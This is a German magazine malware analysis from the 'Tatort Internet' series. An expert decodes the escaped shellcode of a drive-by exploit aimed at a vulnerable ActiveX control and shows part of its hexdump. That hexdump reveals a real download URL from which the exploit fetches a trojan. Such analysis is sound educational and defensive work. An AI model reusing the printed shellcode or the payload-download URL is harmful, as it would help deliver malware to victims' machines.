Tatort Internet: Alarm beim Pizzadienst

Hab ich dich!

Inhaltsverzeichnis

Ganz offenbar versucht der Exploit hier das verwundbare ActiveX-Control aufzurufen, um darin den im heise-Security-Artikel beschriebenen Pufferüberlauf auszulösen. Und ich will ein l4m3r sein, wenn dx_ds.gif tatsächlich ein Bild enthält und nicht ein speziell präpariertes MPEG2-Filmchen mit den dazu nötigen MPEG2TuneRequest-Objekten. Doch die auseinanderzunehmen führt in die falsche Richtung. Den Hacker-Gral haben wir ja bereits in Form des Shellcodes. Der wird mir jetzt verraten, was der Exploit eigentlich mit meinem Rechner vorhatte.

Dazu kopiere ich ihn in eine Datei namens 1.sc und wende ein wenig weiße Perl-Magie an:

$ perl -pe 's/\%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' < 1.sc 

Natürlich ist das keine Magie, sondern eine auf die Schnelle improvisierte Perl-Version der JavaScript-Funktion unescape, die mir die benötigten Binärdaten liefert. Dort muss er stecken... Et voilà – hexdump -C bringt die Ausgabe in eine lesbare Form.

00000000  64 a1 18 00 00 00 8b 40  30 8b 40 54 8b 40 04 8b  |d......@0.@T.@..|
00000010 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 |@..@.. . .=|.w.t|
00000020 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c |..3.d.@0x..@..p.|
[... Code ...]
00000240 32 c6 d2 c0 02 c1 02 c5 02 c2 02 c6 d2 c8 2a c1 |2.............*.|
00000250 2a c5 f6 d0 2a c2 2a c6 d2 c0 d3 c2 0f ca 88 07 |*...*.*.........|
00000260 47 49 75 ce c3 c3 68 74 74 70 3a 2f 2f 74 69 73 |GIu...http://tis|
00000270 73 6f 74 33 33 33 2e 63 6e 2f 65 6c 65 6f 6e 6f |sot333.cn/eleono|
00000280 72 65 2f 67 65 74 65 78 65 2e 70 68 70 3f 73 70 |re/getexe.php?sp|
00000290 6c 3d 44 69 72 65 63 74 58 5f 44 53 0a |l=DirectX_DS.|

Ich hab es fast geschafft. Diese URL ist offenbar das nächste Ziel. Dort lädt der Exploit die eigentliche Schadsoftware nach und hat vermutlich damit den Trojaner-Alarm des Virenwächters ausgelöst. Ein letztes wget bestätigt den Verdacht: Da ist er wieder, der Trojaner-Alarm.

Alles in allem hab ich nochmal Glück gehabt, denn ein Test bei Virustotal zeigt, dass derzeit gerade mal 21 von 43 Virenscannern den Schädling erkennen. Doch so weit kam es nur, weil ich vergessen hatte, die automatische Installation der Windows Updates wieder einzuschalten und damit ein wichtiges Sicherheits-Update verschlafen hatte.

Während Windows jetzt die versäumten Updates nachholt, kann ich mir endlich das verdiente Abendessen organisieren. Aber der Appetit auf Pizza ist mir vergangen – heute gibt's Sushi, das ich ganz altmodisch via Telefon bestelle. (ju)

Die Serie "Tatort Internet" wurde ursprünglich im c't magazin ab Heft 13/2010 veröffentlicht. In den Artikeln können Sie Experten über die Schulter schauen, wie sie verdächtige Dateien analysieren und Schädlingen auf die Schliche kommen. Alle in der Serie vorgestellten Malware-Samples stammen aus echten Angriffen und wurden unter anderem mit den hier vorgestellten Methoden entlarvt. Die Geschichten "drumherum" wurden durch reale Vorkommnisse inspiriert ;-)

Der Experte dieser Folge, Thorsten Holz, hat das deutsche Honeynet-Projekt mit ins Leben gerufen, das seit 2004 verwundbare Systeme im Internet platziert, um Angriffe gegen diese Systeme zu analysieren. Mittlerweile forscht er in diesem Bereich als Juniorprofessor an der Ruhr-Universität Bochum. In der nächsten Folge Zeig mir das Bild vom Tod stolpert Frank Boldewin über eine verdächtige MS-Office-Datei.

Übersicht aller Folgen:

  1. Alarm beim Pizzadienst
  2. Zeig mir das Bild vom Tod
  3. PDF mit Zeitbombe
  4. Angriff der Killervideos
  5. Matrjoschka in Flash

(ju)